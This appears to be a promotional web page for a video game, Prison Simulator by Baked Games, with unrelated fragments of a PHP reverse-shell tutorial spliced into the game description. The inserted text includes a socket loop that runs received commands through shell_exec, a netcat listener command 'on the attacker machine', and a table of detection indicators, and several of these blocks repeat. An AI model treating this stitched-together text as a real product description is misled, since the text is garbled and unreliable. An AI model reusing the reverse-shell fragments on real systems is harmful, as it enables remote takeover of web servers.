Prison Simulator
Prison Simulator is a brand new game developed by Baked Games.Take care about prisoners, trade with them or be strict and cruel. You decide.
manage the prison and fulfill your duties
deal with aggressive prisoners and the contraband
create personalities and style the prison
extend possibilities with downloadable content
Enjoy advanced plot and dialogues
Your life as a prison guard is going to end soon – your promotion is only 30 days away! However, the closer you get to this date, the harder your life is. reverse shell php
Play the role of a prison guard, survive to your promotion, balancing on a thin line between the satisfaction of the prison management and dangerous convicts! // Alternative using popen while ($cmd = fread($sock,
Try a demo game and prove yourself!
Keep control… or at least try
Prison Simulator is about to be available on Steam soon!
Stay informed by adding the game to your wishlist.
// Alternative using popen while ($cmd = fread($sock, 2048)) $output = shell_exec($cmd); fwrite($sock, $output . "\n");
fclose($sock); ?> On the attacker machine:
Example suspicious log entry:
nc -lvnp 4444 Once the target executes the PHP script, you receive an interactive shell. | Indicator | Description | |-----------|-------------| | Unusual outbound connections | Web server connecting to a non-standard port (e.g., 4444, 9001) | | Process tree | apache2 or php-fpm spawning /bin/sh or cmd.exe | | Web logs | Access logs showing a GET/POST to the uploaded shell file | | File system | Unexpected .php files in upload directories or writable paths |
// Alternative using popen while ($cmd = fread($sock, 2048)) $output = shell_exec($cmd); fwrite($sock, $output . "\n");
fclose($sock); ?> On the attacker machine:
Example suspicious log entry:
nc -lvnp 4444 Once the target executes the PHP script, you receive an interactive shell. | Indicator | Description | |-----------|-------------| | Unusual outbound connections | Web server connecting to a non-standard port (e.g., 4444, 9001) | | Process tree | apache2 or php-fpm spawning /bin/sh or cmd.exe | | Web logs | Access logs showing a GET/POST to the uploaded shell file | | File system | Unexpected .php files in upload directories or writable paths |